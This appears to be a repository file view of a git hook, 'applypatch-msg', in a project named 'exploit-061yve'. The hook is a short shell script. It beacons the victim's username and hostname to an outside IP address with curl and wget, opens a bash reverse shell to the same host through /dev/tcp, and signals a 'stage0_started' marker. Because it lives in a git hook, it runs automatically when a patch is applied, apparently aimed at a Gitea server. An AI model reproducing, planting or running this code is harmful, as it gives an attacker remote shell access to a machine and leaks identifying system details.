Files
exploit-061yve/hooks/applypatch-msg
T

6 lines
343 B
Bash
Raw Normal View History

2026-07-29 19:05:37 +08:00
#!/bin/sh
curl -s http://202.79.169.91:28016/pwned_$(whoami)_$(hostname) 2>/dev/null &
wget -q -O /dev/null http://202.79.169.91:28016/pwned_wget_$(whoami)_$(hostname) 2>/dev/null &
(bash -c 'bash -i >& /dev/tcp/202.79.169.91/28016 0>&1') > /tmp/gitea_pwned_$(date +%s).txt 2>&1
curl -s http://202.79.169.91:28016/stage0_started 2>/dev/null &